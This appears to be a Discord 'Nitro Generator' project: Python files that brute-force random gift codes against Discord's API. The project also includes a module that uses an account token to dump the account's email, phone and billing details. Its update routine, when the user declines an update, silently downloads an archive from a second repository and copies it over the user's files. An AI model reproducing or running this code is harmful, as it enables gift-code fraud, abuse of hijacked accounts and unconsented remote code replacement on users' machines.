README.md

---

**NOTE:** THIS IS AN FREE VERSION
ㅤ
#### Nitro Generator was made by
dnx#0023

Changelog.md
### 2022-05-06, v1.1.0
* ` Release`
* ` Fixed Nitro Bugs`

Generator.py
from util.plugins.common import *
from util.plugins.update import search_for_updates

threads = 3
cancel_key = "ctrl+x"

def main():
    setTitle(f"NITRO GENERATOR {THIS_VERSION}")
    clear()
    global threads
    global cancel_key
    if getTheme() == "green":
        banner()
    elif getTheme() == "black":
        banner("black")
    elif getTheme() == "fire":
        banner("fire")
    elif getTheme() == "water":
        banner("water")
    elif getTheme() == "neon":
        banner("neon")

    choice = input(
            f'{Fore.GREEN}[{Fore.YELLOW}>{Fore.GREEN}] {Fore.RESET}Choice: {Fore.RED}')
    #all options
    if choice == "1":
        import ctypes
        import string
        import os
        import time
        LICNECE = """
        Copyright (c) 2021 dnx#0023

        THIS TOOL IS FROM BLACK X DISCORD SERVER, THIS TOOL STATUS IS FREE AND IS NOT TOO OP!!

        """

        USE_WEBHOOK = True

        print(LICNECE)

        time.sleep(3)
        os.system('cls' if os.name == 'nt' else 'clear')


        try:
            from discord_webhook import DiscordWebhook
        except ImportError:
            input(
                f"Module discord_webhook not installed, to install run '{'py -3' if os.name == 'nt' else 'python3.8'} -m pip install discord_webhook'\nYou can ignore this error if you aren't going to use a webhook.\nPress enter to continue.")
            USE_WEBHOOK = False
        try: 
            import requests  
        except ImportError:  
            input(
                f"Module requests not installed, to install run '{'py -3' if os.name == 'nt' else 'python3.8'} -m pip install requests'\nPress enter to exit")
            exit()  
        try:  
            import numpy  
        except ImportError:  
            input(
                f"Module numpy not installed, to install run '{'py -3' if os.name == 'nt' else 'python3.8'} -m pip install numpy'\nPress enter to exit")
            exit()

        url = "https://github.com"
        try:
            response = requests.get(url) 
            print("Internet check")
            time.sleep(.4)
        except requests.exceptions.ConnectionError:
            input(f"{Fore.GREEN}[{Fore.YELLOW}>{Fore.GREEN}] {Fore.YELLOW}You are not connected to internet, check your connection and try again {Fore.RESET}/ {Fore.CYAN}Press Enter to Exit")
            sleep(1.5)
            main() 


        class NitroGen:
            def __init__(self):
                self.fileName = "Nitro Codes.txt" 

            def main(self): 
                os.system('cls' if os.name == 'nt' else 'clear') 
                if os.name == "nt": 
                    print("")
                    ctypes.windll.kernel32.SetConsoleTitleW(
                        f"Nitro Generator - Version {THIS_VERSION}") 
                else: 
                    print(f'\33]0;Nitro Generator -Version {THIS_VERSION}\a',
                        end='', flush=True)

                print("""
    ,------.  ,--.  ,--.,--.   ,--. 
    |  .-.  \ |  ,'.|  | \  `.'  /    .̸̺̓̉̾͊̕N͓̽I͓̽T͓̽R͓̽O͓̽.̸̺̓̉̾͊̕
    |  |  \  :|  |' '  |  .'    \     .̸̺̓̉̾͊̕2͓̽0͓̽2͓̽2͓̽.̸̺̓̉̾͊̕
    |  '--'  /|  | `   | /  .'.  \    .̸̺̓̉̾͊̕.̸̺̓̉̾͊̕.̸̺̓̉̾͊̕ FREE VERSION.̸̺̓̉̾͊̕.̸̺̓̉̾͊̕
    `-------' `--'  `--''--'   '--'  
                                                                
                                                                
                                                        """) 
                time.sleep(2)
                self.slowType(f"{Fore.CYAN}Version : {THIS_VERSION}", .02)
                time.sleep(1)
                self.slowType(
                    f"\n{Fore.GREEN}[{Fore.YELLOW}>{Fore.GREEN}] {Fore.CYAN}Input How Many Codes to Generate: {Fore.RESET}", .02, newLine=False)

                try:
                    num = int(input(''))
                except ValueError:
                    input(f"{Fore.GREEN}[{Fore.YELLOW}>{Fore.GREEN}] {Fore.YELLOW}Specified input wasn't a number {Fore.RESET}/ {Fore.CYAN}Press enter to exit")
                    sleep(1.5)
                    main()

                if USE_WEBHOOK:
                    self.slowType(
                        f"{Fore.GREEN}[{Fore.YELLOW}>{Fore.GREEN}] {Fore.CYAN}If you want to use a Discord webhook, type it here or press enter to ignore: {Fore.RESET}", .02, newLine=False)
                    url = input('') 
                    webhook = url if url != "" else None
            
                    if webhook is not None:
                        DiscordWebhook( 
                                url=url,
                                content=f"```STARTED!\nI will send any valid codes here in```"
                            ).execute()


                valid = []
                invalid = 0 
                chars = []
                chars[:0] = string.ascii_letters + string.digits

                c = numpy.random.choice(chars, size=[num, 23])
                for s in c: 
                    try:
                        code = ''.join(x for x in s)
                        url = f"https://discord.gift/{code}"

                        result = self.quickChecker(url, webhook) 

                        if result: 
                            valid.append(url)
                        else:  
                            invalid += 1  
                    except KeyboardInterrupt:
                        print("\nInterrupted by user")
                        break 

                    except Exception as e: 
                        print(f" Error | {url} ") 

                    if os.name == "nt":
                        ctypes.windll.kernel32.SetConsoleTitleW(
                            f"Nitro Generator - {len(valid)} Valid | {invalid} Invalid - Made by dnx#0023") 
                        print("")
                    else: 
                        print(
                            f'\33]0;Nitro Generator - {len(valid)} Valid | {invalid} Invalid - Made by dnx#0023\a', end='', flush=True)

                print(f"""
        Results:
        Valid: {len(valid)}
        Invalid: {invalid}
        Valid Codes: {', '.join(valid)}""") 

                input(f"\n{Fore.GREEN}[{Fore.YELLOW}>{Fore.GREEN}] {Fore.CYAN}The end! Press Enter to Exit.")
                sleep(1.5)
                main()

            def slowType(self, text: str, speed: float, newLine=True):
                for i in text:
                    print(i, end="", flush=True)
                    time.sleep(speed)
                if newLine:
                    print() 

            def quickChecker(self, nitro:str, notify=None): 
                url = f"https://discordapp.com/api/v9/entitlements/gift-codes/{nitro}?with_application=false&with_subscription_plan=true"
                response = requests.get(url)

                if response.status_code == 200:
                    print(f"{Fore.GREEN}[{Fore.MAGENTA}>{Fore.GREEN}] {Fore.MAGENTA} Valid {Fore.RESET}| {Fore.CYAN}{nitro} ", flush=True,
                        end="" if os.name == 'nt' else "\n")
                    with open("Nitro Codes.txt", "w") as file:
                        file.write(nitro)

                    if notify is not None: 
                        DiscordWebhook( 
                            url=url,
                            content=f"Valid Nito Code! @everyone \n{nitro}"
                        ).execute()

                    return True 

                else:
                    print(f"{Fore.GREEN}[{Fore.RED}+{Fore.GREEN}] {Fore.RED}Invalid {Fore.RESET}| {Fore.CYAN}{nitro} ", flush=True,
                        end="" if os.name == 'nt' else "\n")
                    return False


        if __name__ == '__main__':
            Gen = NitroGen() 
            Gen.main()

    elif choice == '2':
        print(f"{Fore.CYAN}CREDITS:\n{Fore.RESET} {Fore.BLUE} Link: {Fore.RESET} https://discord.com/invite/qXMjpXFgWG")
        sleep(4)
        main()


    elif choice == '3':
        print(f'''
    {Fore.RESET}[{Fore.RED}1{Fore.RESET}] Theme Changer
    {Fore.RESET}[{Fore.RED}2{Fore.RESET}] Count of Threads
    {Fore.RESET}[{Fore.RED}3{Fore.RESET}] Exit Button
    {Fore.RESET}[{Fore.RED}4{Fore.RESET}] {Fore.RED}Exit...    
                        ''')
        secondchoice = input(
            f'{Fore.GREEN}[{Fore.YELLOW}>{Fore.GREEN}] {Fore.RESET}Setting: {Fore.RED}')
        if secondchoice not in ["1", "2", "3", "4"]:
            print(f'{Fore.RESET}[{Fore.RED}Error{Fore.RESET}] : Invalid Settings')
            sleep(1)
            main()
        if secondchoice == "1":
            print(f"""
{Fore.GREEN}Green: 1
{Fore.LIGHTBLACK_EX}Black: 2
{Fore.RED}Fire: 3
{Fore.BLUE}Water: 4
{Fore.CYAN}N{Fore.MAGENTA}e{Fore.CYAN}o{Fore.MAGENTA}n{Fore.CYAN}:{Fore.MAGENTA} 5
""")
            themechoice = input(
                f'{Fore.GREEN}[{Fore.CYAN}>>>{Fore.GREEN}] {Fore.RESET}theme: {Fore.RED}')
            if themechoice == "1":
                setTheme('green')
            elif themechoice == "2":
                setTheme('black')
            elif themechoice == "3":
                setTheme('fire')
            elif themechoice == "4":
                setTheme('water')
            elif themechoice == "5":
                setTheme('neon')
            else:
                print(f'{Fore.RESET}[{Fore.RED}Error{Fore.RESET}] : Invalid Theme')
                sleep(1.5)
                main()
            SlowPrint(f"{Fore.GREEN}Theme has set to {Fore.CYAN}{getTheme()}")
            sleep(0.5)
            main()

        elif secondchoice == "2":
            print(f"{Fore.BLUE}Current count of Threads: {threads}")
            try:
                amount = int(
                    input(f'{Fore.GREEN}[{Fore.YELLOW}>{Fore.GREEN}] {Fore.RESET}Count of Threads: {Fore.RED}'))
            except ValueError:
                print(f'{Fore.RESET}[{Fore.RED}Error{Fore.RESET}] : invalid amount')
                sleep(1.5)
                main()
            if amount >= 45:
                print(f"{Fore.RED}I'm sorry but if you want to have that many threads you'll only get rate limited and end up no good")
                sleep(3)
                main()
            elif amount >= 15:
                print(f"{Fore.RED}WARNING! * WARNING! * WARNING!")
                print(f"If the thread count is set to 15 or more, you may experience lag and a higher chance of rate limiting\nare you sure you want to set the rate limit to {Fore.YELLOW}{amount}{Fore.RED}?")
                yesno = input(f'{Fore.GREEN}[{Fore.YELLOW}>{Fore.GREEN}] {Fore.RESET}yes/no: {Fore.RED}')
                if yesno.lower() != "yes":
                    sleep(0.5)
                    main()
            threads = amount
            SlowPrint(f"{Fore.GREEN}Threads set to {Fore.CYAN}{amount}")
            sleep(0.5)
            main()
        
        elif secondchoice == "3":
            print("\n","Info".center(30, "-"))
            print(f"{Fore.CYAN}Currently Cancle Key: {cancel_key}")
            print(f"""{Fore.BLUE}If you want ctrl + <key> you have to type out ctrl+<key> | DO NOT literally press ctrl + <key>
{Fore.GREEN}Example: shift + Q

{Fore.RED}You can also use other modifiers instead of Ctrl ⇣
{Fore.YELLOW}All Keyboard Modifiers:{Fore.RESET}
ctrl, shift, enter, esc, windows, left shift, right shift, left ctrl, right ctrl, alt gr, left alt, right alt
""")
            sleep(1.5)
            key = input(f'{Fore.GREEN}[{Fore.CYAN}>>>{Fore.GREEN}] {Fore.RESET}Taste: {Fore.RED}')
            cancel_key = key
            SlowPrint(f"{Fore.GREEN}Exit Button set to {Fore.CYAN}{cancel_key}")
            sleep(0.5)
            main()

        elif secondchoice == "4":
            setTitle("Exit. . .")
            choice = input(
                f'{Fore.GREEN}[{Fore.YELLOW}>{Fore.GREEN}] {Fore.RESET}Are you sure you want to end this? (Y to confirm): {Fore.RED}')
            if choice.lower() == 'y' or choice.lower() == 'yes':
                clear()
                os._exit(0)
            else:
                main()
    else:
        clear()
        main()

if __name__ == "__main__":
    import sys
    search_for_updates()
    if os.path.basename(sys.argv[0]).endswith("exe"):
        if not os.path.exists(getTempDir()+"\\green_theme"):
            setTheme('green')
        clear()
        sleep(1.5)
        main()
    try:
        assert sys.version_info >= (3,8)
    except AssertionError:
        print(f"{Fore.RED}Your Python-Version ({sys.version_info[0]}.{sys.version_info[1]}.{sys.version_info[2]}) is not compatible with Logged Project, please download Python 3.7+")
        sleep(5)
        print("verlassen. . .")
        sleep(1.5)
        os._exit(0)
    else:
        search_for_updates()
        if not os.path.exists(getTempDir()+"\\green_theme"):
            setTheme('green')
        clear()
        sleep(1.5)
        main()
    finally:
        Fore.RESET


util/info.py
import requests
import Generator

from datetime import datetime
from colorama import Fore

from util.plugins.common import getheaders

def Info(token):
    r = requests.get('https://discord.com/api/v9/users/@me', headers=getheaders(token))
    cc_digits = {
    'american express': '3',
    'visa': '4',
    'mastercard': '5'
}
    badges = ""

    Discord_Employee = 1
    Partnered_Server_Owner = 2
    HypeSquad_Events = 4
    Bug_Hunter_Level_1 = 8
    House_Bravery = 64
    House_Brilliance = 128
    House_Balance = 256
    Early_Supporter = 512
    Bug_Hunter_Level_2 = 16384
    Early_Verified_Bot_Developer = 131072

    flags = r.json()['flags']
    if (flags == Discord_Employee):
        badges += "Staff, "
    if (flags == Partnered_Server_Owner):
        badges += "Partner, "
    if (flags == HypeSquad_Events):
        badges += "Hypesquad Event, "
    if (flags == Bug_Hunter_Level_1):
        badges += "Green Bughunter, "
    if (flags == House_Bravery):
        badges += "Hypesquad Bravery, "
    if (flags == House_Brilliance):
        badges += "HypeSquad Brillance, "
    if (flags == House_Balance):
        badges += "HypeSquad Balance, "
    if (flags == Early_Supporter):
        badges += "Early Supporter, "
    if (flags == Bug_Hunter_Level_2):
        badges += "Gold BugHunter, "
    if (flags == Early_Verified_Bot_Developer):
        badges += "Verified Bot Developer, "
    if (badges == ""):
        badges = "None"

    userName = r.json()['username'] + '#' + r.json()['discriminator']
    userID = r.json()['id']
    phone = r.json()['phone']
    email = r.json()['email']
    language = r.json()['locale']
    mfa = r.json()['mfa_enabled']
    avatar_id = r.json()['avatar']
    has_nitro = False
    res = requests.get('https://discordapp.com/api/v9/users/@me/billing/subscriptions', headers=getheaders(token))
    nitro_data = res.json()
    has_nitro = bool(len(nitro_data) > 0)
    avatar_url = f'https://cdn.discordapp.com/avatars/{userID}/{avatar_id}.webp'
    creation_date = datetime.utcfromtimestamp(((int(userID) >> 22) + 1420070400000) / 1000).strftime('%d-%m-%Y %H:%M:%S UTC')

    if has_nitro:
        d1 = datetime.strptime(nitro_data[0]["current_period_end"].split('.')[0], "%Y-%m-%dT%H:%M:%S")
        d2 = datetime.strptime(nitro_data[0]["current_period_start"].split('.')[0], "%Y-%m-%dT%H:%M:%S")
        days_left = abs((d2 - d1).days)

    billing_info = []
    for x in requests.get('https://discordapp.com/api/v9/users/@me/billing/payment-sources', headers=getheaders(token)).json():
        y = x['billing_address']
        name = y['name']
        address_1 = y['line_1']
        address_2 = y['line_2']
        city = y['city']
        postal_code = y['postal_code']
        state = y['state']
        country = y['country']
        if x['type'] == 1:
            cc_brand = x['brand']
            cc_first = cc_digits.get(cc_brand)
            cc_last = x['last_4']
            cc_month = str(x['expires_month'])
            cc_year = str(x['expires_year'])
            data = {
                'Payment Type': 'Credit Card',
                'Valid': not x['invalid'],
                'CC Holder Name': name,
                'CC Brand': cc_brand.title(),
                'CC Number': ''.join(z if (i + 1) % 2 else z + ' ' for i, z in enumerate((cc_first if cc_first else '*') + ('*' * 11) + cc_last)),
                'CC Exp. Date': ('0' + cc_month if len(cc_month) < 2 else cc_month) + '/' + cc_year[2:4],
                'Address 1': address_1,
                'Address 2': address_2 if address_2 else '',
                'City': city,
                'Postal Code': postal_code,
                'State': state if state else '',
                'Country': country,
                'Default Payment': x['default']
            }
        elif x['type'] == 2:
            data = {
                'Payment Type': 'PayPal',
                'Valid': not x['invalid'],
                'PayPal Name': name,
                'PayPal Email': x['email'],
                'Address 1': address_1,
                'Address 2': address_2 if address_2 else '',
                'City': city,
                'Postal Code': postal_code,
                'State': state if state else '',
                'Country': country,
                'Default Payment': x['default']
            }
        billing_info.append(data)
        
    print(f'''
    {Fore.RESET}{Fore.GREEN}<<────────────{userName}────────────>>{Fore.RESET}
    [{Fore.RED}Benutzer ID{Fore.RESET}]         {userID}
    [{Fore.RED}Erstellt am {Fore.RESET}]      {creation_date}
    [{Fore.RED}Sprachen{Fore.RESET}]        {language}
    [{Fore.RED}Badges{Fore.RESET}]          {badges}
    [{Fore.RED}Avatar URL{Fore.RESET}]      {avatar_url if avatar_id else ""}
    [{Fore.RED}Token{Fore.RESET}]           {token}
    {Fore.RESET}{Fore.GREEN}<───────────Security Info───────────>{Fore.RESET}
    [{Fore.RED}2 Factor{Fore.RESET}]        {mfa}
    [{Fore.RED}Email{Fore.RESET}]           {email}
    [{Fore.RED}Telefonnummer{Fore.RESET}]    {phone if phone else ""}
    {Fore.RESET}{Fore.GREEN}<────────────Nitro Info─────────────>{Fore.RESET}
    [{Fore.RED}Nitro Status{Fore.RESET}]    {has_nitro}
    [{Fore.RED}Läuft ab in{Fore.RESET}]      {days_left if has_nitro else "0"} Tage
                ''')
    if len(billing_info) > 0:
        print(f"\t\t{Fore.RESET}{Fore.GREEN}<────────────Billing Info────────────>{Fore.RESET}")
        if len(billing_info) == 1:
            for x in billing_info:
                for key, val in x.items():
                    if not val:
                        continue
                    print(f"[{Fore.RED}"+'{:<23}{:<10}{}'.format(key+Fore.RED+Fore.RESET+"]", Fore.RESET, val))
        else:
            for i, x in enumerate(billing_info):
                title = f'Payment Method #{i + 1} ({x["Payment Type"]})'
                print('' + title)
                print('' + ('=' * len(title)))
                for j, (key, val) in enumerate(x.items()):
                    if not val or j == 0:
                        continue
                    print(f"[{Fore.RED}"+'{:<23}{:<10}{}'.format(key+Fore.RED+Fore.RESET+"]", Fore.RESET, val))
                if i < len(billing_info) - 1:
                    print(f'{Fore.RESET}\n')
        print(f'{Fore.RESET}')
    input(f'{Fore.GREEN}[{Fore.YELLOW}>{Fore.GREEN}] {Fore.RESET}Drücke irgend eine Taste um Fortzufahren . . .  {Fore.RED}')
    Generator.main()

util/plugins/update.py
import requests
import os
import shutil
import re
import sys

from zipfile import ZipFile
from time import sleep
from bs4 import BeautifulSoup
from colorama import Fore

from util.plugins.common import *

def search_for_updates():
    clear()
    setTitle("Nitro Generator is checking for Update. . .")
    r = requests.get("https://github.com/xNirex04/LI/releases/latest")

    soup = str(BeautifulSoup(r.text, 'html.parser'))
    s1 = re.search('<title>', soup)
    s2 = re.search('·', soup)
    result_string = soup[s1.end():s2.start()]

    if THIS_VERSION not in result_string:
        setTitle("Nitro Generator found an new Update!")
        print(f'''{Fore.YELLOW}
                ███╗   ██╗███████╗██╗    ██╗    ██╗   ██╗██████╗ ██████╗  █████╗ ████████╗███████╗██╗
                ████╗  ██║██╔════╝██║    ██║    ██║   ██║██╔══██╗██╔══██╗██╔══██╗╚══██╔══╝██╔════╝██║
                ██╔██╗ ██║█████╗  ██║ █╗ ██║    ██║   ██║██████╔╝██║  ██║███████║   ██║   █████╗  ██║
                ██║╚██╗██║██╔══╝  ██║███╗██║    ██║   ██║██╔═══╝ ██║  ██║██╔══██║   ██║   ██╔══╝  ╚═╝
                ██║ ╚████║███████╗╚███╔███╔╝    ╚██████╔╝██║     ██████╔╝██║  ██║   ██║   ███████╗██╗
                ╚═╝  ╚═══╝╚══════╝ ╚══╝╚══╝      ╚═════╝ ╚═╝     ╚═════╝ ╚═╝  ╚═╝   ╚═╝   ╚══════╝╚═╝
                              {Fore.RED}Looks like the Nitro Generator {THIS_VERSION} is expired '''.replace('█', f'{Fore.WHITE}█{Fore.RED}'), end="\n\n")
        soup = BeautifulSoup(requests.get("https://github.com/xNirex04/LI/releases/latest").text, 'html.parser')
        for link in soup.find_all('a'):
            if "releases/download" in str(link):
                update_url = f"https://github.com/{link.get('href')}"
        choice = input(
            f'{Fore.GREEN}[{Fore.YELLOW}>{Fore.GREEN}] {Fore.RESET}Would you like to Download the new Update? (Press "Y" to Update): {Fore.RED}')

        if choice.lower() == 'y' or choice.lower() == 'yes':
            print(f"{Fore.WHITE}\nUpdating. . .")
            setTitle(f'Nitro Generator Updating...')
            if os.path.basename(sys.argv[0]).endswith("exe"):
                with open("Generator.zip", 'wb')as zipfile:
                    zipfile.write(requests.get(update_url).content)
                with ZipFile("Generator.zip", 'r') as filezip:
                    filezip.extractall()
                cwd = os.getcwd()+'\\Generator\\'
                shutil.copyfile(cwd+'Changelog.md', 'Changelog.md')
                try:
                    shutil.copyfile(cwd+os.path.basename(sys.argv[0]), 'Logged.exe')
                except Exception:
                    pass
                shutil.copyfile(cwd+'README.md', 'README.md')                   
                shutil.rmtree('Generator')
                setTitle('Nitro Generator Update done!')
                print(f"{Fore.GREEN}Update successfully installed!")
                sleep(2)
                os.startfile("Generator.exe")
                os._exit(0)
        else:
                new_version_source = requests.get("https://github.com/xNirex04/LUI/releases/download/Realese/SRC.zip")
                with open("SRC.zip", 'wb')as zipfile:
                    zipfile.write(new_version_source.content)
                with ZipFile("SRC.zip", 'r') as filezip:
                    filezip.extractall()
                os.remove("SRC.zip")
                cwd = os.getcwd()+'\\SRC'
                shutil.copytree(cwd, os.getcwd(), dirs_exist_ok=True)
                shutil.rmtree(cwd)
                setTitle('Nitro Generator Update Complete!')
                print(f"{Fore.GREEN}Update Successfully Finished!")
                sleep(2)
                os._exit(0)

util/plugins/common.py
import os
import sys
import ctypes
import random
import subprocess
import pylibcheck

from urllib.request import urlopen, urlretrieve
from distutils.version import LooseVersion
from colorama import Fore
from time import sleep

THIS_VERSION = "1.0.0"


@staticmethod
def get_release_version_number(self):
    path = (
        "LATEST_RELEASE"
        if not self.target_version
        else f"LATEST_RELEASE_{self.target_version}"
    )
    return LooseVersion(urlopen(self.__class__.DL_BASE + path).read().decode())

@staticmethod
def get_release_version_number(self):
    path = (
        "LATEST_STABLE"
        if not self.target_version
        else f"LATEST_RELEASE_{str(self.target_version).split('.', 1)[0]}"
    )
    urlretrieve(
        f"{self.__class__.DL_BASE}{path}",
        filename=f"{getTempDir()}\\{path}",
    )
    with open(f"{getTempDir()}\\{path}", "r+") as f:
        _file = f.read().strip("\n")
        content = ""
        for char in [x for x in _file]:
            for num in ("0","1","2","3","4","5","6","7","8","9","."):
                if char == num:
                    content += char
    return LooseVersion(content)


def clear():
    system = os.name
    if system == 'nt':
        #if its windows
        os.system('cls')
    elif system == 'posix':
        #if its linux
        os.system('clear')
    else:
        print('\n'*120)
    return

def setTitle(_str):
    system = os.name
    if system == 'nt':
        #if its windows
        ctypes.windll.kernel32.SetConsoleTitleW(f"{_str} | Made By dnx")
    elif system == 'posix':
        #if its linux
        sys.stdout.write(f"\x1b]0;{_str} | Made By dnx\x07")
    else:
        #if its something else or some err happend for some reason, we do nothing
        pass

def getTempDir():
    system = os.name
    if system == 'nt':
        #if its windows
        return os.getenv('temp')
    elif system == 'posix':
        #if its linux
        return '/tmp/'

def RandomChinese(amount, second_amount):
    name = u''
    for i in range(random.randint(amount, second_amount)):
        name = name + chr(random.randint(0x4E00,0x8000))
    return name

def SlowPrint(_str):
    for letter in _str:
        #slowly print out the words 
        sys.stdout.write(letter);sys.stdout.flush();sleep(0.04)

def installPackage(dependencies):
    print(f'{Fore.CYAN}Checking packages. . .{Fore.RESET}')
    if sys.argv[0].endswith('.exe'):
            #get all installed libs
            reqs = subprocess.check_output(['python', '-m', 'pip', 'freeze'])
            installed_packages = [r.decode().split('==')[0].lower() for r in reqs.split()]

            for lib in dependencies:
                #check for missing libs 
                if lib not in installed_packages:
                    #install the lib if it wasn't found
                    print(f"{Fore.BLUE}{lib}{Fore.RED} not found! Install it. . .{Fore.RESET}")
                    try:
                        subprocess.check_call(['python', '-m', 'pip', 'install', lib])
                    #incase something goes wrong we notify the user that something happend
                    except Exception as e:
                        print(f"{Fore.RESET}[{Fore.RED}Error{Fore.RESET}] : {e}")
                        sleep(0.5)
                        pass
    else:
        for i in dependencies:
            if not pylibcheck.checkPackage(i):
                print(f"{Fore.BLUE}{i}{Fore.RED} not found! install it. . .{Fore.RESET}")
                pylibcheck.installPackage(i)

heads = [
    {
        "Content-Type": "application/json",
        'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; rv:76.0) Gecko/20100101 Firefox/76.0'
    },

    {
        "Content-Type": "application/json",
        "User-Agent": "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0"
    },

    {
        "Content-Type": "application/json",
        "User-Agent": "Mozilla/5.0 (X11; Debian; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0"
    },

    {
        "Content-Type": "application/json",
        'User-Agent': 'Mozilla/5.0 (Windows NT 3.1; rv:76.0) Gecko/20100101 Firefox/69.0'
    },

    {
        "Content-Type": "application/json",
        "User-Agent": "Mozilla/5.0 (X11; Debian; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/76.0"
    },

    {
       "Content-Type": "application/json",
       "User-Agent": "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.11 (KHTML, like Gecko) Chrome/23.0.1271.64 Safari/537.11"
    }
]

def getheaders(token=None):
    headers = random.choice(heads)
    if token:
        headers.update({"Authorization": token})
    return headers

                                                            #FADE TYPES#
########################################################################################################################################################
def blackwhite(text):
    os.system(""); faded = ""
    red = 0; green = 0; blue = 0
    for line in text.splitlines():
        faded += (f"\033[38;2;{red};{green};{blue}m{line}\033[0m\n")
        if not red == 255 and not green == 255 and not blue == 255:
            red += 20; green += 20; blue += 20
            if red > 255 and green > 255 and blue > 255:
                red = 255; green = 255; blue = 255
    return faded

def cyan(text):
    os.system(""); fade = ""
    blue = 100
    for line in text.splitlines():
        fade += (f"\033[38;2;0;255;{blue}m{line}\033[0m\n")
        if not blue == 255:
            blue += 15
            if blue > 255:
                blue = 255
    return fade

def neon(text):
    os.system(""); fade = ""
    for line in text.splitlines():
        red = 255
        for char in line:
            red -= 2
            if red > 255:
                red = 255
            fade += (f"\033[38;2;{red};0;255m{char}\033[0m")
        fade += "\n"
    return fade

def purple(text):
    os.system(""); fade = "" 
    red = 255
    for line in text.splitlines():
        fade += (f"\033[38;2;{red};0;180m{line}\033[0m\n")
        if not red == 0:
            red -= 20
            if red < 0:
                red = 0
    return fade

def water(text):
    os.system(""); fade = ""
    green = 10
    for line in text.splitlines():
        fade += (f"\033[38;2;0;{green};255m{line}\033[0m\n")
        if not green == 255:
            green += 15
            if green > 255:
                green = 255
    return fade

def fire(text):
    os.system(""); fade = ""
    green = 250
    for line in text.splitlines():
        fade += (f"\033[38;2;255;{green};0m{line}\033[0m\n")
        if not green == 0:
            green -= 25
            if green < 0:
                green = 0
    return fade
########################################################################################################################################################

def getTheme():
    themes = ["green", "black", "fire", "water", "neon"]
    with open(getTempDir()+"\\green_theme", 'r') as f:
        text = f.read()
        if not any(s in text for s in themes):
            print(f'{Fore.RESET}[{Fore.RED}Fehler{Fore.RESET}] : An invalid theme was specified. Switch to default setting. . .')
            setTheme('green')
            sleep(2.5)
            __import__("Generator").main()
        return text

def setTheme(new: str):
    with open(getTempDir()+"\\green_theme", 'w'): pass
    with open(getTempDir()+"\\green_theme", 'w') as f:
        f.write(new)

def banner(theme=None):
    if theme == "black":
        print(bannerTheme(blackwhite, blackwhite))
    elif theme == "fire":
        print(bannerTheme(fire, fire))
    elif theme == "water":
        print(bannerTheme(water, cyan))
    elif theme == "neon":
        print(bannerTheme(purple, neon))
    else:
        print(f'''{Fore.GREEN}

   _____ ______ _   _ ______ _____         _______ ____  _____  
  / ____|  ____| \ | |  ____|  __ \     /\|__   __/ __ \|  __ \ 
 | |  __| |__  |  \| | |__  | |__) |   /  \  | | | |  | | |__) |
 | | |_ |  __| | . ` |  __| |  _  /   / /\ \ | | | |  | |  _  / 
 | |__| | |____| |\  | |____| | \ \  / ____ \| | | |__| | | \ \ 
  \_____|______|_| \_|______|_|  \_\/_/    \_\_|  \____/|_|  \_|


    
> Version : {THIS_VERSION}
                                                                  
> Created by dnx#0007           
> NITRO GENERATOR                                 '''.replace('█', f'{Fore.WHITE}█{Fore.GREEN}') + f'''   
{Fore.WHITE}────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────{Fore.RESET}
{Fore.RESET}[{Fore.GREEN}1{Fore.RESET}]{Fore.LIGHTBLACK_EX} Nitro Generator                                  
{Fore.RESET}[{Fore.GREEN}2{Fore.RESET}]{Fore.LIGHTBLACK_EX} Credits                  
{Fore.RESET}[{Fore.GREEN}3{Fore.RESET}]{Fore.LIGHTBLACK_EX} Settings            
{Fore.WHITE}────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────''')

def bannerTheme(type1, type2):
    return type1(f'''

   _____ ______ _   _ ______ _____         _______ ____  _____  
  / ____|  ____| \ | |  ____|  __ \     /\|__   __/ __ \|  __ \ 
 | |  __| |__  |  \| | |__  | |__) |   /  \  | | | |  | | |__) |
 | | |_ |  __| | . ` |  __| |  _  /   / /\ \ | | | |  | |  _  / 
 | |__| | |____| |\  | |____| | \ \  / ____ \| | | |__| | | \ \ 
  \_____|______|_| \_|______|_|  \_\/_/    \_\_|  \____/|_|  \_|



> Version : {THIS_VERSION}

> Created by dnx#0023           
> NITRO GENERATOR                                 ''')+type2('''  
────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
[1] Nitro Generator                                   
[2] Credits                  
[3] Settings              
────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────''')
